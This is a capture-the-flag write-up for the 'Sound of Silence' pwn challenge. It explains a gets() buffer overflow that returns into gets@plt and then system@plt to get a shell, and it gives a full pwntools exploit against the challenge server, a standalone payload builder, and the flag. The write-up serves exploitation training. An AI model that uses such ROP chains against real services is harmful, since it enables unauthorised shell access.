# Pwn - Sound of Silence

## Description

Navigate the shadows in a dimly lit room, silently evading detection as you strategize to outsmart your foes. Employ clever distractions to divert their attention, paving the way for your daring escape!

## Downloads

{% file src="https://4077916634-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9J6tnLQGbY0Or10P4xUT%2Fuploads%2FwG10w5GMoXNT1omH0x7I%2Fpwn_sound_of_silence.zip?alt=media&token=198025ce-1956-44e3-994e-f2b9e0657e72" %}

## Solution

<figure><img src="https://4077916634-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9J6tnLQGbY0Or10P4xUT%2Fuploads%2FZdgDWikb4liYu4jKyfng%2Fimage.png?alt=media&#x26;token=cce7f20c-ac23-4646-8d1f-c7b32139b089" alt=""><figcaption><p>Checksec</p></figcaption></figure>

Firstly, Full RELRO rules out GOT overwrites, and NX means we can't run shellcode from the stack. Note also that the exploit below needs no leak and overflows straight over the return address; that only works because the PLT entries sit at fixed addresses (no PIE) and there is no stack canary in the way.

<figure><img src="https://4077916634-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9J6tnLQGbY0Or10P4xUT%2Fuploads%2FcD2gKRrnz4VdSgUeJYUj%2Fimage.png?alt=media&#x26;token=5f9363f2-e4fe-4f23-9d72-a322063793dd" alt=""><figcaption><p>main()</p></figcaption></figure>

The program is small: it has `system()` and `gets()` but no 'win' function, so the goal is to make it run `system("/bin/sh")`. What made this look hard is that there was no gadget to set `rdi`, the first-argument register. (After the event, someone pointed out that `main()` itself contains a `mov rdi, rax` sequence that ROPgadget did not report, so that could have been used instead.)

<figure><img src="https://4077916634-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9J6tnLQGbY0Or10P4xUT%2Fuploads%2F668JkR0N3MvAjR4lLBZZ%2Fimage.png?alt=media&#x26;token=457ac175-cc20-4512-b941-3cd96e27108c" alt=""><figcaption><p>The only gadget which is not so useful.</p></figcaption></figure>

But we don't need a gadget at all. `gets()` writes its input to the address passed in `rdi`, and in practice that register still holds a usable buffer pointer when we return straight into `gets@plt`; `rdi` is left pointing at the same buffer when `gets()` returns, so returning next into `system@plt` calls `system()` on whatever we just typed.

Another thing to note: if we just send "/bin/sh" to the second `gets()`, the 5th character comes back one lower ('/', 0x2f, became '.', 0x2e).

<figure><img src="https://4077916634-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9J6tnLQGbY0Or10P4xUT%2Fuploads%2Fz0fDaK7yFyWi6DjCIOHx%2Fimage.png?alt=media&#x26;token=7b6586aa-5758-4601-932a-f831b647e0bb" alt=""><figcaption><p>'/bin/sh' became '/bin.sh'</p></figcaption></figure>

To compensate we send "/bin0sh" instead: '0' is 0x30, one above '/', so after the shift the buffer holds "/bin/sh".

```python
from pwn import *

exe = './sound_of_silence'
elf = context.binary = ELF(exe, checksec=False)
# context.log_level = 'debug'

# Bytes from the start of the buffer to the saved return address.
offset = 40

# io = process(exe)
io = remote("94.237.63.93", 59792)

# Chain: return into gets@plt so it reads a second line into the address
# rdi still holds, then return into system@plt, which uses that same rdi
# as its argument. No leak needed: the PLT entries are at fixed addresses.
payload = b'A' * offset
payload += p64(elf.plt.gets)
payload += p64(elf.plt.system)

io.sendlineafter(b'>> ', payload)

# The program lowers the byte at index 4 by one ('/' -> '.'), so send '0'
# (0x30), which becomes '/' (0x2f) and leaves "/bin/sh" in the buffer.
io.sendline(b'/bin0sh')

io.interactive()
```
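To make the two tricks explicit, here is an added example (not part of the original writeup, and not using pwntools) that builds the same two lines with only the standard library. The PLT addresses are placeholders I made up for the stand-alone run; the real ones come from `elf.plt` as in the script above. It also goes slightly beyond the page: the pre-image function works for any index and step size and refuses a pre-image that `gets()` could not deliver (a newline), and `build_chain` can insert an optional `ret` gadget for stack alignment, a standard caveat that this challenge did not need.

```python
import struct

# Placeholder PLT addresses for the stand-alone demo (constructed, not the
# real binary's); the writeup's script reads the real ones from elf.plt.
EXAMPLE_GETS_PLT = 0x401030
EXAMPLE_SYSTEM_PLT = 0x401040
RET_OFFSET = 40  # bytes from the buffer start to the saved return address


def p64(value):
    """Little-endian 8-byte packing, the same as pwntools' p64 on x86-64."""
    return struct.pack("<Q", value)


def build_chain(offset, gets_plt, system_plt, ret_gadget=None):
    """First line to send: padding, gets@plt, then system@plt.

    We enter gets@plt with a `ret`, so when gets() itself returns it pops the
    next 8 bytes off the stack; that is why system@plt simply follows it.
    `ret_gadget` is an optional extra `ret` before system@plt to realign the
    stack. The writeup did not need it, but it is the usual fix when system()
    faults on an SSE instruction because rsp is not 16-byte aligned.
    """
    chain = [gets_plt]
    if ret_gadget is not None:
        chain.append(ret_gadget)
    chain.append(system_plt)
    tail = b"".join(p64(addr) for addr in chain)
    # gets() stops at a newline, so a 0x0a byte inside an address would
    # truncate the chain (NUL bytes are fine: gets() does not stop on them).
    if b"\n" in tail:
        raise ValueError("chain contains 0x0a; gets() would cut it short")
    return b"A" * offset + tail


def preimage_for_decrement(target, index, delta=1):
    """Bytes to send so the buffer holds `target` after the program lowers
    the byte at `index` by `delta`.

    On the page, index 4 of "/bin/sh" came back one lower ('/' 0x2f -> '.'
    0x2e), so the pre-image of '/' is '0' (0x30).
    """
    buf = bytearray(target)
    wanted = buf[index] + delta
    if wanted > 0xFF:
        # Only reachable through wrap-around, which we do not assume.
        raise ValueError("no single byte decrements to 0x%02x" % buf[index])
    if wanted == 0x0A:
        raise ValueError("pre-image is a newline; gets() would not store it")
    buf[index] = wanted
    return bytes(buf)


def simulate_shift(data, index, delta=1):
    """Model of the program's observed transform: byte at `index` drops by `delta`."""
    buf = bytearray(data)
    buf[index] = (buf[index] - delta) & 0xFF
    return bytes(buf)


def solve_lines(offset=RET_OFFSET, gets_plt=EXAMPLE_GETS_PLT,
                system_plt=EXAMPLE_SYSTEM_PLT):
    """The two lines the exploit sends, in order: ROP chain, then command."""
    command = preimage_for_decrement(b"/bin/sh", 4)
    # Sanity check against the modelled transform before sending anything.
    assert simulate_shift(command, 4) == b"/bin/sh"
    return [build_chain(offset, gets_plt, system_plt), command]


if __name__ == "__main__":
    for line in solve_lines():
        print(line.hex())
```

Each returned line is what `sendline()` would carry; the newline that `sendline()` appends is exactly the terminator `gets()` waits for, which is also why a 0x0a byte inside an address is fatal while NUL bytes are harmless.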

<figure><img src="https://4077916634-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9J6tnLQGbY0Or10P4xUT%2Fuploads%2Fxd4FLMmMg16GU8cJBhEF%2Fimage.png?alt=media&#x26;token=d8c23c95-ca6e-402a-ade6-4440db5cb518" alt=""><figcaption><p>Pwned</p></figcaption></figure>

Flag: `HTB{n0_n33d_4_l34k5_wh3n_u_h4v3_5y5t3m}`
